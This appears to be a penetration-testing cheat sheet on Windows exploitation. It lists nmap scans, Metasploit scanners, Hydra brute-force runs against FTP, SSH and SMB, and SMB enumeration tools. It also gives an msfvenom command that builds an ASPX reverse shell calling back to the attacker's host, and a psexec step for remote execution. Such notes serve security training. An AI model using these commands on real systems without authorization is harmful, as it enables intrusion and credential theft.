Windows Exploitation

Port Scanning & Enumeration - Windows

Conduct a common port scan

nmap -sV <ip>

Perform a port scan on ports 1 to 10000 and save output to "nmap_10k".

nmap -T4 -PA -sC -sV -p 1-10000 <ip> -oX nmap_10k

Perform a port scan on all ports and save output to "nmap_all".

nmap -T4 -PA -sC -sV -p- <ip> -oX nmap_all

Conduct a UDP port scan.

nmap -sU -sV -p- <ip>

msfconsole commands:
- workspace -a <workspace_name> – Create a new workspace.
- workspace – Display the current workspace.
- db_import <nmap_scan_file_path> – Import an Nmap scan report into the database.
- hosts – List discovered hosts in the current workspace.
- services – List services associated with discovered hosts.
- auxiliary/scanner/smb/smb_version – Use Metasploit to scan for SMB version information.

Targeting Microsoft IIS FTP

nmap -sV -p 21 --script=ftp-anon <target-IP>

Conduct an Nmap scan on port 21 with the "ftp-anon" script to check for anonymous FTP access.

hydra -L /usr/share/wordlists/metasploit/unix_users.txt -P /usr/share/wordlists/metasploit/unix_passwords.txt <Ip>

Use Hydra to perform a brute-force attack using a list of Unix usernames and passwords against the specified target.

msfvenom -p windows/shell/reverse_tcp LHOST=<our_IP> LPORT=<our_Port> -f asp > shell.aspx

Generate a reverse shell payload in ASP format using msfvenom, with the specified listener IP and port, and save it to a file named "shell.aspx".

Targeting OpenSSH

hydra -l vagrant -P /usr/share/wordlists/metasploit/unix_passwords.txt <Ip>

Use Hydra to perform a brute-force attack with the username "vagrant" and a list of Unix passwords against the specified target IP.

auxiliary/scanner/ssh/ssh_login

Use this Metasploit auxiliary module to scan for SSH servers and attempt to log in using provided credentials or default ones.

Targeting MySQL Database Server

nmap -sV -sC -p 3306,8585 <ip>

Conduct an Nmap scan with version detection and default scripts on ports 3306 and 8585 of the specified IP.

auxiliary/scanner/mysql/mysql_login

Use this Metasploit auxiliary module to scan for MySQL servers and attempt to log in using provided credentials or default ones.

mysql -u <user> -p <pass> -h <ip>

Use the MySQL client to connect to the specified IP using the given username and password.

Targeting SMB

hydra -l administrator -P /usr/share/wordlists/metasploit/unix_passwords.txt <Ip> smb

Use Hydra to perform a brute-force attack with the username "administrator" and a list of Unix passwords against the SMB service on the specified IP.

smbclient -L <ip> -U <user-Name>

Use smbclient to list shares on the target IP, providing a username.

smbmap -u <user_name> -p <pass> -H <ip>

Utilize smbmap to enumerate shares on the target IP, providing a username and password.

enum4linux -u <user-name> -p <password> -U <ip>

Run enum4linux to gather information from the target IP using specified credentials.

auxiliary/scanner/smb/smb_enumusers

Use this Metasploit auxiliary module to enumerate user accounts on an SMB server.

python3 psexec.py Administrator@<ip>

Run the psexec.py script to attempt remote command execution as the Administrator user on the specified IP.
Ensure to look at the services and their versions for further analysis.

Hacker's Mantra:The hacker didn’t succeed through sophistication. Rather he poked at obvious places, trying to enter through unlocked doors. Persistence, not wizardry, let him through. - Clifford Stoll

PreviousExploitation Frameworks NextLinux Exploitation

Last updated 10 months ago

Was this helpful?